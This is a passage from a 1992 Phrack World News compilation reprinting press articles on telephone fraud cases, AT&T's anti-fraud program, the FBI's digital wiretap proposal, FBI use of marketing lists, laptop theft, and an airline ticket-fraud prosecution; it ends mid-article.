$5,000 to $25,000. While he could receive a maximum of ten years on each count, Assistant U.S. Attorney Alphonse Andrews said Schoenbohm probably will spend no more than eight months in prison since all three counts are similar and will be merged. Much of the evidence on the four day trial involved people who received unauthorized telephone calls from KV4FZ during a 1987 period recorded by the CALLS computer. Since the incident took place more than five years ago, many could not pinpoint the exact date of the telephone calls. The prosecution produced 20 witnesses from various U.S locations, including agents from the Secret Service, the U.S. Marshals Service, Treasury Department and Federal Communications Commission. In addition ham operators testified for the prosecution. Schoenbohm was portrayed as a criminal who had defrauded calls out of hundreds of thousands of dollars. Schoenbohm admitted using the service as a paying customer, said it did not work and that he terminated the service and never used it again. He feels that there was much political pressure to get him tried and convicted since he had been writing unfavorably articles about Representative DeLugo, a non-voting delegate to Congress from the Virgin Islands, including his writing of 106 bad checks during the recent rubbergate scandal. Most, but not all the ham operators in attendance were totally opposed to KV4FZ. Bob Sherrin, W4ASX from Miami attended the trial as a defense character witness. Sherrin told us that he felt the conviction would be overturned on appeal and that Schoenbohm got a raw deal. "They actually only proved that he made $50 in unauthorized calls but the jury was made to believe it was $1,000." Schoenbohm's attorney asked for a continuance due to newly discovered evidence, but that was denied. There also is a question as to whether the jury could even understand the technology involved. "Even his own lawyer couldn't understand it, and prepared an inept case," Sherrin said. "I think he was railroaded. They were out to get him. There were a lot of ham net members there and they were all anti-Herb Schoenbohm. The only people that appeared normal and neutral were the FCC. The trial probably cost them a million dollars. All his enemies joined to bring home this verdict." Schoenbohm had been suspended with pay from the police department job since being indicted by the St. Croix grand jury. His status will be changed to suspension without pay if there is an appeal. Termination will be automatic if the conviction is upheld. Schoenbohm's wife was recently laid off from her job at Pan Am when the airline closed down. Financially, it could be very difficult for KV4FZ to organize an appeal with no money coming in. The day after the KV4FZ conviction, Schoenbohm who is the Republican Committee vice chairman was strangely named at a territorial convention as one of eight delegates to attend the GOP national convention in Houston this August. He was nominated at the caucus even though his felony conviction was known to everyone. Schoenbohm had even withdrawn his name from consideration since he was now a convicted felon. The Virgin Island Daily News later reported that Schoenbohm will not be attending the GOP national convention. "Schoenbohm said he came to the conclusion that my remaining energies must be spent in putting my life back together and doing what I can to restore my reputation. I also felt that any publicity in association with my selection may be used by critics against the positive efforts of the Virgin Islands delegation." Schoenbohm has been very controversial and vocal on the ham bands. Some ham operators now want his amateur radio license pulled -- and have made certain that the Commission is very much aware of his conviction. _______________________________________________________________________________ AT&T Launches Program To Combat Long-Distance Theft May 13, 1992 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By Virginia Randall (United Press International/UPI) Citing the mushrooming cost of long-distance telephone fraud, American Telephone & Telegraph Co. announced plans to combat theft of long-distance telephone services from customers. AT&T's program, dubbed NetProtect, is an array of software, consulting, customer education and monitoring services for businesses. One program limits customer liability to the first $25,000 of theft, while another ends customer liability entirely under certain circumstances. By law, companies are liable for the cost of calls made on their systems, authorized or not. Jerre Stead, president of AT&T's Business Communications unit, said, "The program not only offers financial relief to victims of long-distance fraud. It also gives our customers new products and services specifically designed to prevent and detect fraud." Long-distance calling fraud ranges from a few dollars to the hundreds of thousands of dollars for victims. The Communications Fraud Control Association, an industry group, estimates long-distance calling fraud costs more than $1 billion a year, said Peggy Snyder, an association spokeswoman. NetProtect Basic Service, offered free with long-distance and domestic 800 service, consists of ongoing monitoring around the clock for unusual activity. The company will start this service this week. NetProtect Enhanced and Premium services offer more customized monitoring and limit customer liability to $25,000 per incident or none at all, depending on the program selected. Pricing and permission to provide the Enhanced and Premium services are dependent on Federal Communication Commission approval. AT&T expects to offer these programs beginning August 1. Other offerings are a $1,995 computer software package called "Hacker Tracker," consulting services and the AT&T Fraud Intervention Service, a swat team of specialists who will detect and stop fraud while it is in progress. The company also will provide a Security Audit Service that will consult with customers on possible security risks. Pricing will be calculated on a case-by- case basis, depending on complexity. The least expensive option for customers is AT&T's Security Handbook and Training, a self-paced publication available for $65 which trains users on security features for AT&T's PBX, or private branch exchanges, and voice mail systems. Fraud occurs through PBX systems, which are used to direct the external telephone calls of a business. Company employees use access codes and passwords to gain entry to their PBX system. A typical use, the industry fraud group's Snyder said, would be a sales force on the road calling into their home offices for an open line to call other customers nationally or worldwide. These access codes can be stolen and used to send international calls through the company's network, billable to the company. Unauthorized access to PBXs occur when thieves use an automatic dialing feature in home computers to dial hundreds of combinations of phone numbers until they gain access to a company's PBX system. These thieves, also known as hackers, phone freaks or phrackers, then make their own calls through the PBX system or sell the number to a third party to make calls. Others use automatic dialing to break into PBX systems through voice mail systems because such systems have remote access features. Calls from cellular phones also are at risk if they are remotely accessed to a PBX. Electronic mail systems for intracompany calls are not affected because they don't require PBX systems. According to Bob Neresian of AT&T, most fraud involves long-distance calls to certain South American and Asian countries, especially Columbia and Pakistan. There is no profile of a typical company at risk for telephone fraud, said Snyder. "Any company of any size with long-distance service is at risk," she said. "Criminals don't care who the long distance provider is or how big the company they're stealing from is." She said the industry recognized the dimensions of telephone theft in 1985, when the Communications Fraud Control Association was formed in Washington D.C. The group consists of providers of long-distance service, operator services, private payphones, end-users of PBX systems, federal, state and local law enforcement agencies and prosecutors. Janice Langley, a spokeswoman for US Sprint Corp. in Kansas City, Mo., called AT&T's announcement similar to a program her company announced March 31. That service, SprintGuard Plus, is available to companies with a call volume of $30,000 a month. Sprint also offers basic monitoring program to customers without charge. "We don't have minimum billing requirements for any of these services or systems," responded AT&T's Neresian. "All the carriers have seen the problem and have been working on their own approaches," he said. Jim Collins, a spokesman for MCI Communications in Washington, said his company had been conducting phone fraud workshops free of charge for customers for four years. _______________________________________________________________________________ ==Phrack Inc.== Volume Four, Issue Thirty-Nine, File 12 of 13 PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN Phrack World News PWN PWN PWN PWN Issue XXXIX / Part Three of Four PWN PWN PWN PWN Compiled by Datastream Cowboy PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN New Phones Stymie FBI Wiretaps April 29, 1992 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By Simson L. Garfinkel (Christian Science Monitor)(Page 12) "Legislation proposed by Justice Department would change the way telecommunications equipment is developed in the United States." For more than 50 years, wiretapping a telephone has been no more difficult than attaching two clips to a telephone line. Although legal wiretaps in the United States have always required the approval of a judge or magistrate, the actual wiretap has never been a technical problem. Now that is changing, thanks to the same revolution in communications that has made car phones, picture telephones, and fax machines possible. The only thing a person tapping a digital telephone would hear is the indecipherable hiss and pop of digital bits streaming past. Cellular telephones and fiber-optic communications systems present a would-be wiretapper with an even more difficult task: There isn't any wire to tap. Although cellular radio calls can be readily listened in on with hand-held scanners, it is nearly impossible to pick up a particular conversation -- or monitor a particular telephone -- without direct access to the cellular telephone "switch," which is responsible for connecting the radio telephones with the conventional telephone network. This spring, the Federal Bureau of Investigation (FBI) unveiled legislation that would require telephone companies to include provisions in their equipment for conducting court-ordered wiretaps. But critics of the legislation, including some members of Congress, claim that the proposals would expand the FBI's wiretap authority and place an undue burden on the telecommunications industry. Both sides agree that if provisions for monitoring communications are not made in the planning stages of new equipment, it may eventually become impossible for law enforcement personnel to conduct wiretaps. "If the technology is not fixed in the future, I could bring an order [for a wiretap] to the telephone company, and because the technology wasn't designed with our requirement in mind, that person could not [comply with the court order]," says James K. Kalstrom, the FBI's chief of engineering. The proposed legislation would require the Federal Communications Commission (FCC) to establish standards and features for makers of all electronic communications systems to put into their equipment, require modification of all existing equipment within 180 days, and prohibit the sale or use of any equipment in the US that did not comply. The fine for violating the law would be $10,000 per day. "The FBI proposal is unprecedented," says Representative Don Edwards (D) of California, chairman of the House Judiciary Subcommittee on Civil and Constitutional Rights and an outspoken critic of the proposal. "It would give the government a role in the design and manufacture of all telecommunications equipment and services." Equally unprecedented, says Congressman Edwards, is the legislation's breadth: The law would cover every form of electronic communications, including cellular telephones, fiber optics, satellite, microwave, and wires. It would cover electronic mail systems, fax machines, and all networked computer systems. It would also cover all private telephone exchanges -- including virtually every office telephone system in the country. Many civil liberties advocates worry that if the ability to wiretap is specifically built into every phone system, there will be instances of its abuse by unauthorized parties. Early this year, FBI director William Sessions and Attorney General William Barr met with Senator Ernest F. Hollings (D) of South Carolina, chairman of the Senate Commerce Committee, and stressed the importance of the proposal for law enforcement. Modifying the nation's communications systems won't come cheaply. Although the cost of modifying existing phone systems could be as much as $300 million, "We need to think of the costs if we fail to enact this legislation," said Mr. Sessions before a meeting of the Commerce, Justice, State, and Judiciary Subcommittees in April. The legislation would pass the $300 million price-tag along to telephone subscribers, at an estimated cost of 20 cents per line. But an ad-hoc industry coalition of electronic communications and computer companies has objected not only to the cost, but also to the substance of the FBI's proposal. In addition, they say that FCC licensing of new technology would impede its development and hinder competitiveness abroad. Earlier this month, a group of 25 trade associations and major companies, including AT&T, GTE, and IBM, sent a letter to Senator Hollings saying that "no legislative solution is necessary." Instead, the companies expressed their willingness to cooperate with the FBI's needs. FBI officials insist that legislation is necessary. "If we just depend on jaw-boning and waving the flag, there will be pockets, areas, certain places" where technology prevents law enforcement from making a tap, says Mr. Kalstrom, the FBI engineer. "Unless it is mandatory, people will not cooperate." For example, Kalstrom says, today's cellular telephone systems were not built with the needs of law enforcement in mind. "Some companies have modified their equipment and we can conduct surveillance," he says. But half of the companies in the US haven't, he adds. Jo-Anne Basile, director of federal relations for the Cellular Telecommunications Industry Association here in Washington, D.C., disagrees. "There have been problems in some of the big cities because of [limited] capacity," Ms. Basile says. For example, in some cities, cellular operators had to comply with requests for wiretaps by using limited "ports" designed for equipment servicing. Equipment now being installed, though, has greatly expanded wiretap capacity in those areas. "We believe that legislation is not necessary because we have cooperated in the past, and we intend on cooperating in the future," she adds. The real danger of the FBI's proposal is that the wiretap provisions built in for use by the FBI could be subverted and used by domestic criminals or commercial spies from foreign countries, says Jerry Berman, director of the Electronic Frontier Foundation, a computer users' protection group in Cambridge, Mass. "Anytime there is a hearing on computer hackers, computer security, or intrusion into AT&T, there is a discussion that these companies are not doing enough for security. Now here is a whole proposal saying, 'Let's make our computers more vulnerable.' If you make it more vulnerable for the Bureau, don't you make it more vulnerable for the computer thief?" Civil liberties advocates also worry that making wiretaps easier will have the effect of encouraging their use -- something that the FBI vehemently denies. "Doing a wiretap has nothing to do with the [technical] ease," says Kalstrom. "It is a long legal process that we must meet trying all other investigations before we can petition the court." Kalstrom points out the relative ease of doing a wiretap with today's telephone system, then cites the federal "Wiretap Report," which states that there were only 872 court-approved wiretaps nationwide in 1990. "Ease is not the issue. There is a great dedication of manpower and cost," he says. But digital wiretapping has the potential for drastically lowering the personnel requirements and costs associated with this form of electronic surveillance. Computers could listen to the phone calls, sitting a 24-hour vigil at a low cost compared with the salary of a flesh-and-blood investigator. "Now we are seeing the development of more effective voice-recognition systems," says Edwards. "Put voice recognition together with remote-access monitoring, and the implications are bracing, to say the least." Indeed, it seems that the only thing both sides agree on is that digital telephone systems will mean more secure communications for everybody. "It is extremely easy today to do a wiretap: Anybody with a little bit of knowledge can climb a telephone poll today and wiretap someone's lines," says Kalstrom. "When the digital network goes end-to-end digital, that will preclude amateur night. It's a much safer network from the privacy point of view." - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - FBI Fight With Computer, Phone Firms Intensifies May 4, 1992 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Taken from Los Angeles Times (Business, Part D, Page 2) "Spy Agencies Oppose Technology That Will Prevent Them From Tapping Into Data And Conversations" Top computer and telecommunications executives are fighting attempts by the FBI and the nation's intelligence community to ensure that government surveillance agencies can continue to tap into personal and business communications lines as new technology is introduced. The debate flared last week at a House Judiciary Committee hearing on foreign intelligence agencies' attempts to gather U.S. companies' secrets. The committee's chairman, Representative Jack Brooks (D-Tex.), called the hearing to complain that the FBI and the National Security Agency (NSA) are hurting companies' attempts to protect their communications. The issue has been heating up on two fronts. Phone companies have been installing digital equipment that frustrates phone tapping efforts, and computer companies are introducing new methods of securing data transmissions that are almost impossible for intelligence agencies to penetrate. The controversy centers, in part, on an FBI attempt to persuade Congress to force telephone companies to alter their digital networks, at a possible cost of billions of dollars that could be passed on to ratepayers, so that the FBI can continue performing court-authorized wiretaps. Digital technology temporarily converts conversations into computerized code, which is sent at high speed over transmission lines and turned back to voice at the other end, for efficient transmission. Civil liberties groups and telecommunications companies are fiercely resisting the FBI proposal, saying it will stall installation of crucial technology and negate a major benefit of digital technology: Greater phone security. The critics say the FBI plan would make it easier for criminals, terrorists, foreign spies and computer hackers to penetrate the phone network. The FBI denies these and other industry assertions. Meanwhile, the NSA, the nation's super-secret eavesdropping agency, is trying to ensure that government computers use a computer security technology that many congressmen and corporate executives believe is second-rate, so that NSA can continue monitoring overseas computer data transmissions. Corporations likely would adopt the government standard. Many corporate executives and congressmen believe that a branch of the Commerce Department that works closely with NSA, the National Institute of Standards and Technology (NIST), soon will endorse as the government standard a computer- security technology that two New Jersey scientists said they penetrated to demonstrate its weakness. NIST officials said that their technology wasn't compromised and that it is virtually unbreakable. "In industry's quest to provide security (for phones and computers), we have a new adversary, the Justice Department," said D. James Bidzos, president of California-based RSA Data Security Inc., which has developed a computer- security technology favored by many firms over NIST's. "It's like saying that we shouldn't build cars because criminals will use them to get away." "What's good for the American company may be bad for the FBI" and NSA, said Representative Hamilton Fish Jr. (R-N.Y.). "It is a very heavy issue here." The situation is a far cry from the 1950s and 1960s, when companies like International Business Machines Corporation and AT&T worked closely with law- enforcement and intelligence agencies on sensitive projects out of a sense of patriotism. The emergence of a post-Vietnam generation of executives, especially in new high-technology firms with roots in the counterculture, has short-circuited the once-cozy connection, industry and government officials said. "I don't look at (the FBI proposal) as impeding technology," FBI Director William S. Sessions testified at the Judiciary Committee hearing. "There is a burden on the private sector . . . a price of doing business." FBI officials said they have not yet fumbled a criminal probe due to inability to tap a phone, but they fear that time is close. "It's absolutely essential we not be hampered," Sessions said. "We cannot carry out our responsibilities" if phone lines are made too secure. On the related computer-security issue, the tight-lipped NSA has never commented on assertions that it opposes computerized data encryption technologies like that of RSA Data Security because such systems are uncrackable. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - For more articles on this same topic, please see: Phrack 38, File 11; The Digital Telephony Proposal. _______________________________________________________________________________ FBI Seeks Compiled Lists For Use In Its Field Investigation April 20, 1992 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By Ray Schultz (DMNews)(Page 1) Special Thanks: The Omega and White Knight Washington, D.C. -- The Federal Bureau of Investigation, in a move that could spell trouble for the industry, reported is seeking commercial mailing lists for use in its investigations. Spokespersons for both MetroMail Corporation and Donnelley Marketing confirmed that they were approached for services within the last two weeks and other firms also received feelers. Neither of the identified firms would discuss details, but one source familiar with the effort said the FBI apparently is seeking access to a compiled consumer database for investigatory uses. The FBI agents showed "detailed awareness" of the products they were seeking, and claimed to have already worked with several mailing list companies, according to the source. Metromail, which has been supplying the FBI with its MetroNet address lookup service for two years, did not confirm this version of events. Spokesperson John Tomkiw said only that the firm was asked by the FBI about a "broadening" of its services. The firm has supplied the bureau with a full listing of its products and services, but has not yet been contacted back and is not sure what action it will take, said Tomkiw. Donnelley was also vague on the specifics of the approach, but did say it has declined any FBI business on the grounds that it would be an inappropriate use of its lists. FBI spokesperson Bill Carter was unable to provide confirmation, although he did verify that the FBI uses MetroNet to locate individuals needed for interviews. If the database scenario is true, it would mark the first major effort by a government agency to use mailing lists for enforcement since the Internal Revenue Service tried to use rented lists to catch tax cheats in 1984. "We have heard of it," said Robert Sherman, counsel to the Direct Marketing Association and attorney with the firm of Milgrim Thomajan & Lee, New York. "We'd like to know more about it. If it is what it appears to be, law enforcement agents attempting to use marketing lists for law enforcement purposes, then the DMA and industry would certainly be opposed to that on general principles." Such usage would "undermine consumer confidence in the entire marketing process and would intrude on what otherwise would be harmless collection of data," Sherman said. RL Polk, which has not been contacted, said it would decline for the same reasons if approached. "That's not a proper use of our lists," said Polk chairman John O'Hara. "We're in the direct mail business and it's our policy not to let our lists be used for anything but marketing purposes." According to one source, who requested anonymity, the FBI intimated that it would use its subpoena power if refused access to the lists. The approaches, made through the FBI training center in Quantico, VA, reportedly were not the first. The FBI's Carter said the MetroNet product was used for address lookups only. "If a field office needs to locate somebody for an interview, we can check the [MetroNet] database as to where they reside and provide that information to the field office," he said. However, the product was cited as a potential threat to privacy last year by Richard Kessel, New York State Consumer Affairs Commissioner. In a statement on automatic number identifiers, Kessel's office said that "one firm offers to provide 800-number subscribers immediate access to information on 117-million customers in 83-million households nationwide. "The firm advertises that by matching the number of an incoming call into its database, and an 800 subscriber within seconds can find out such information as whether the caller has previously purchased items from their companies." Kessel included a copy of a trade ad for MetroNet, in which the product is presented as a direct marketing tool. Under the headline "Who am I?" the copy reads as if it is by an imaginary consumer. "The first step to knowing me better is as easy as retrieving my phone number in an Automatic Number Identification environment," it says. "Within seconds you can search your internal database to see if I've purchased from you before. And if it's not to be found, there's only one place to go -- to MetroNet. "MetroNet gives you immediate access to information on 117-million consumers in 83-million households nationwide: recent addresses; phone numbers; specific demographics and household information." Tomkiw defended the product, saying its primary focus is "direct marketing. We're always sensitive to those types of issues." MetroNet works as an electronic white pages, but does not contain "a lot of demograhpic data," he said. "It's primarily used by the real estate and insurance industries." The 1984 IRS effort reportedly was a failure, but it created a public outcry and much negative publicity for the industry. Though Polk, MetroMail and Donnelley all refused to rent their lists for the effort, the IRS was able to locate other lists through Dunhill of Washington. Most industry sources say that such efforts are doomed to fail because lists are useful only in identifying people in aggregate, not as individuals." _______________________________________________________________________________ Do You Know Where Your Laptop Is? May 11, 1992 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By Robert Kelly (InformationWeek) Are your executives carrying computers with critical data? If so, company secrets are vulnerable It was an expensive round of window shopping. On December 17, 1990, David Farquhar parked his car in downtown London to browse through an automobile showroom. A Wing Commander in Great Britain's Royal Air Force, he was enjoying a few moments away from the mounting pressures leading up to the Gulf War, which would begin less than a month later. But Farquhar made a huge mistake: He left his laptop computer in his car. And although he was gone a mere five minutes, by the time he returned, the laptop had been stolen -- as had U.S. General Norman Schwarzkopf's plans, stored in the computer's disk drive, for the upcoming Allied strike against Iraq. Farquhar paid dearly for his carelessness. Soon after the red-faced Wing Commander reported the incident, he was court-martialed, demoted, and slapped with a substantial fine. The computer was anonymously returned a week later- with the disk drive intact. Farquhar may feel alone in his dilemma and rue the wrong turn his life has taken, but such episodes are anything but isolated. Though electronic security sources say it's too soon to keep score yet on the exact number of laptop thefts, anecdotally, at least, it appears a computer crime wave is underway. According to electronic data experts, during the past 18 months, as laptop purchases have soared, theft has taken off also. For instance, at the Computer Security Institute (CSI), an organization that ironically comprises corporate security experts, a half-dozen members have already reported their company laptops stolen, says Phil Chapnick, director of the San Francisco-based group. And there are probably more that aren't speaking about it, he adds: "Victims prefer to maintain a low profile." So do the perpetrators, obviously. But a picture of who some of them are is beginning to emerge, says John Schey, a security consultant for the federal government. He says a roving band of "computer hit men" from New York, Los Angeles, and San Francisco has been uncovered; members are being paid upwards of $10,000 to steal portable computers and strategic data stored on those machines from executives at Fortune 1,000 companies. Federal agents, Schey adds, are conducting a "very, very dynamic and highly energized investigation to apprehend the group." U.S. law enforcement authorities refuse to comment on the issue. Laptop theft is not, of course, limited to the United States. According to news reports, and independently confirmed by InformationWeek, visiting executives from NCR Corp. learned that reality the hard way recently when they returned to their rooms after dinner at the Nikko Hotel in Paris to find the doors removed from their hinges. The rooms were ransacked, turned upside down, but the thieves found what they were looking for. All that was taken were two laptops containing valuable corporate secrets. Paul Joyal, president of Silver Spring, Maryland, security firm Integer and a former director of security for the Senate Intelligence Committee, says he learned from insiders close to the incident that French intelligence agents, who are known for being chummy with domestic corporations, stole the machines. Joyal suspects they were working for a local high-tech company. An NCR spokesman denies knowledge of the incident, but adds that "with 50,000 employees, it would be impossible to confirm." Similar thefts, sources say, have occurred in Japan, Iraq, and Libya. It's not hard to figure out why laptop theft is on the rise. Unit sales of laptops are growing 40% annually, according to market researchers Dataquest Inc., and more than 1 million of them enter the technology stream each year. Most of the machines are used by major companies for critical tasks, such as keeping the top brass in touch when they're on the road, spicing up sales calls with real data pulled from the corporate mainframe, and entering field data into central computers. Because of laptops, says Dan Speers, an independent data analyst in West Paterson, New Jersey, "there's a lot of competitive data floating around." And a perfect way to steal information from central corporate databases. Thieves are not only taking laptops to get at the data stored in the disk drives, but also to dial into company mainframes. And sometimes these thieves are people the victims would least suspect. One security expert tells of "the wife of a salesman for a Fortune 500 manufacturing firm who worked for a direct competitor." While her husband slept, she used his laptop to log on to a mainframe at his company and download confidential sales data and profiles of current and potential customers. "The husband's job," says the security expert, "not the wife's, was terminated." Such stories, and there are plenty of them, have led many U.S. companies to give lip service to laptop theft, but in almost all cases they're not doing much about it. "Management has little or no conception of the vulnerability of their systems," says Winn Schwartau, executive director of InterPact, an information security company in Nashville. That's not surprising, adds CSI's Chapnick: "Security typically lags technology by a couple of years." Playing Catch-Up Still, some companies are trying to catch up quickly. Boeing Corp., Grumman Corp., and Martin Marietta Corp., among others, have adopted strict policies on portable data security. This includes training staffers on laptop safety rules, and even debriefing them when they return from a trip. One company, sources say, was able to use such a skull session to identify a European hotel as a threat to data security, and put it on the restricted list for future trips. Conde Nast Publications Inc. is taking the the issue even more seriously. The New York-based magazine group's 65-member sales force uses laptops to first canvas wholesalers, then upload data on newsstand sales and distribution problems to the central mainframe. To ensure that the corporate database isn't poisoned by rogue data, "we have a very tight security system," says Chester Faye, Conde Nast's director of data processing. That system's centerpiece is a program, created in-house at Conde Nast, that lets the mainframe read an identification code off of the chip of each laptop trying to communicate with it. "The mainframe, then, can hang up on laptops with chip IDs it doesn't recognize and on those reported stolen by sales reps," says Faye. And some organizations hope to go to even greater lengths. InterPact's Schwartau says a government agency in Great Britain wants to build a device that attaches to a user's belt and disconnects communication to a mainframe when the laptop deviates 15 degrees vertically. The reason: To protect corporate data if the person using the laptop is shot and killed while dialing in. Users say they're taking such extreme measures because the vendors don't; most laptops arrive from the factory without adequate security protection. Most require a password before booting, but thieves can decipher them with relative ease. Some also have removable hard drives, but again, these can be stolen with similar impunity and therefore provide little protection. Ironically, none of this may be necessary; experts emphasize that adding security to a laptop will not serve to price it out of existence. By some estimates, building in protection measures raises the price of a laptop by at most 20%. Beaver Computer Corp. in San Jose, California, for example, has a product to encrypt the data on a laptop's hard drive and floppy disks. With this, the information can't be accessed without an "electronic key" or password. BCC has installed this capability on its own laptop, the SL007, which seems to have passed muster with some very discriminating customers: Sources close to the company say a major drug cartel in Colombia wants some of these machines to protect drug trafficking data. Equally important is the need to protect data in the host computer from hackers who have stolen passwords and logons. Security Dynamics Technologies Inc. in Cambridge, Massachusetts, offers the credit card-sized SecurID, which can be attached to most laptops. SecurID consists of a $60 device that is connected to the laptop, and additional hardware (Cost: $3,800 to $13,000) installed on the host. SecurID continuously changes the logon used to dial into the host; by the time a hacker gets around to using a stolen logon, for instance, it will be obsolete. But what if all measures fail? You can always insure the hardware; can you insure the data? Not yet, but soon, says Nashville-based newsletter Security Insider Report. An upstart startup will soon begin offering data insurance policies that may include coverage of information lost when a portable computer is stolen. Company Cooperation >From protection to insurance, however, no measure can work unless laptop owners take the problem seriously. And that doesn't always happen. Case in point: In the late 1980s, the Internal Revenue Service approached Schwartau's firm to develop a blueprint for securing the confidential data that travels over phone lines between the 30,000 laptops used by field auditors and IRS offices. Schwartau came up with a solution. But the IRS shelved its security plans, and has done nothing about it since, he charges. Even those who should know better can run afoul of the laptop crime wave. About 18 months ago, Ben Rosen, chairman of laptop maker Compaq Computer Corp., left his machine behind on the train; it was promptly stolen. Rosen insists there was no sensitive data in the computer, but he did lose whatever he had. Unlike Schwarzkopf's plans, the laptop was never returned. _______________________________________________________________________________ ==Phrack Inc.== Volume Four, Issue Thirty-Nine, File 13 of 13 PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN Phrack World News PWN PWN PWN PWN Issue XXXIX / Part Four of Four PWN PWN PWN PWN Compiled by Datastream Cowboy PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN Airline Claims Flier Broke Law To Cut Costs April 21, 1992 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By Del Jones (USA Today)(Page 1B) CHICAGO -- American Airlines had one of its most frequent business fliers arrested and handcuffed last summer as he prepared to board a flight at Dallas- Fort Worth Airport. The nation's largest airline -- and the industry's trend setter -- says it uncovered, then snuffed, a brilliant ticket fraud scheme that cost American more than $200,000 over 20 months. Economist William Gibson, who has homes in Chicago and Dallas, will stand trial in early June. If convicted, he would face a maximum prison term of 125 years. He pleads innocent, although he readily admits using lapsed non-refundable tickets regularly to fly at rock- bottom prices. But, he says, he did it with the full blessing of American's agents. Gibson says American and the FBI are out to make a high-profile example out of him to instill a little religion into frequent business fliers, who grow bold as they grow more resentful of an industry that makes its best customers pay substantially higher prices than its worst. Indeed, American Airlines says one reason it slashed full coach fares 38% two weeks ago was to douse customer resentment that was escalating into hostility. Now, the airline industry is again looking to American for a glimpse of the future to see if Gibson's prosecution will set a trend toward lowering the boom on alleged fare cheaters. American says conclusions should not be drawn from its decision to push for Gibson's prosecution. It alleges that he was conducting outright fraud and his case is unrelated to the thousands of frequent fliers who break airline rules to save money. Common rule bending includes: Flying to so-called hidden cities when a short flight is more expensive than a long one, splitting two non-refundable round-trip tickets over two separate trips to fly low-cost without staying the dreaded Saturday or selling frequent-flier mileage to brokers. But while against airline rules, such gaming, as the airlines call it, is not against the law. And American doesn't want its prosecution of one of its Gold AAdvantage fliers being likened to, say, Procter & Gamble asking the FBI to bust babies who wet the most Pampers. The last thing the airline wants, it says, is to make a martyr of Gibson, who is fighting back with not only a lawyer but also a public-relations specialist. "Somebody at American is embarrassed and mad," says Gibson, who flew more than 300,000 miles during the disputed 20-month period. He passed a polygraph test, his lawyer says. But the questions fell far short of asking Gibson if his intent in using cheap tickets was to defraud American. Gibson, age 47, says he would never risk his career by cheating an airline. While in his late 20s, he was President Nixon's senior staff economist, the youngest person to hold the job. He had a hand in cleaning up the Texas savings-and-loan mess as an organizer of the Southwest Plan. His mother still has a photograph of his first plane trip, taken when he was in the third grade. It was on American. Despite his background, Gibson says he's not confident that a jury will relate to someone who travels with "a boatload" of tickets just to avoid being stranded or delayed. If he were flying to a family-run business in Puerto Rico, for example, he would carry tickets that would route him through New York, Dallas or Miami just to make sure he got where he was going and with as little airport layover time as possible. Gibson had as many as 50 airline tickets in his possession at one time, though some were used by his family. American Airlines and the FBI won't reveal what Gibson did that makes him, in their opinion, such a devious genius. Details could be a how-to lesson for others, they say. What they do disclose is a simple scheme, but also one that should be caught by the crudest of auditing procedures. Gibson, they allege, would buy a full-fare coach or first-class ticket near the time of departure. Then he would detach the expensive ticket from the boarding pass and attach a cheap, expired ticket. The full-fare ticket, which he allegedly bought just to secure a boarding pass, would be turned in later for a refund. FBI spokesman Don Ramsey says Gibson also altered tickets, which is key to the prosecution's case because it shows intent to defraud. Ramsey would not say what alterations allegedly were made. But they could involve the upgrade stickers familiar to frequent passengers, says Tom Parsons, editor and publisher of Best Fares. Those white stickers, about the size of postage stamps, are given away or sold at token prices to good customers so they can fly first-class in seats that otherwise would be vacant. Parsons says Gibson could have bought a full-fare ticket to secure a boarding pass, switched the full-fare ticket with the lapsed discount ticket and then applied the sticker to hide the expired date. Presto, a first-class flight for peanuts. "I think it was an accident that they caught him," Parsons says. "And let's just say this is not a one-person problem. A lot of people have told me they've done this." Gibson says he did nothing illegal or even clever. He says he learned a few years ago that American is so eager to please its best customers, it would accept tickets that had long ago expired. He would "load up" during American's advertised sales on cheap, non-refundable tickets that are restricted to exact flights on precise days. But as a member of American's Gold AAdvantage club, reserved for its top 2% of frequent fliers, Gibson says, his expired tickets were welcome anytime. There was no deception, Gibson says. American's gate agents knew what they were accepting, and they accepted them gladly, he says. "That's absolute nonsense," says American spokesman Tim Smith. "We don't let frequent fliers use expired tickets. Everyone assumed he had a valid ticket." The courtesy Gibson says he was extended on a regular basis does appear to be rare. Seven very frequent fliers interviewed by USA TODAY say they've never flown on lapsed discount tickets. But they admit they've never tried because the fare structure is usually designed to make sure business travelers can't fly on the cheap. Peter Knoer tried. The account executive based in Florham Park, New Jersey, says Continental Airlines once let him use lapsed non-refundable tickets. "They looked up my account number, found out I was a good customer and patted me on the head." Gibson has been indicted on 24 counts of fraud that allegedly occurred between July 1989 and March 1991. American also stripped him of frequent -- flier mileage worth $80,000. He says he's in good shape if the prosecution's case relies on ticket alteration. There wasn't any, he says. The prosecution will also try to prove that Gibson cheated his company of $43,000 by listing the refunded high-priced tickets on his travel expenses. Gibson denies the charge. He says that when he left as chairman and chief executive of American Federal Bank in Dallas in 1990, "they owed me money and I owed them money." Both sides agreed to a "final number." Lone Star Technologies, American Federal's parent company, declines to comment. Al Davis, director of internal audit for Southwest Airlines, says the Gibson case will be a hot topic when airline auditors convene to share the latest schemes.. He says fraud is not rampant because a frequent flier must know the nuances and also be conniving enough to take advantage. "It has me boggled" how any one person could steal $200,000 worth, Davis says. The figure has others in the industry wondering if this is a bigger problem than believed and a contributor to the $6 billion loss posted by the major airlines the past two years. Airlines know some fraud goes on, but they rarely take legal action because they "don't want to pay more for the cure than the disease is costing," Davis says. _______________________________________________________________________________ Privacy Invaders May 1992 ~~~~~~~~~~~~~~~~ By William Barnhill (AARP Bulletin) Special Thanks: Beta-Ray Bill U.S. Agents Foil Ring Of Information Thieves Who Infiltrated Social Security Computer Files Networks of "information thieves" are infiltrating Social Security's computer files, stealing confidential personal records and selling the information to whoever 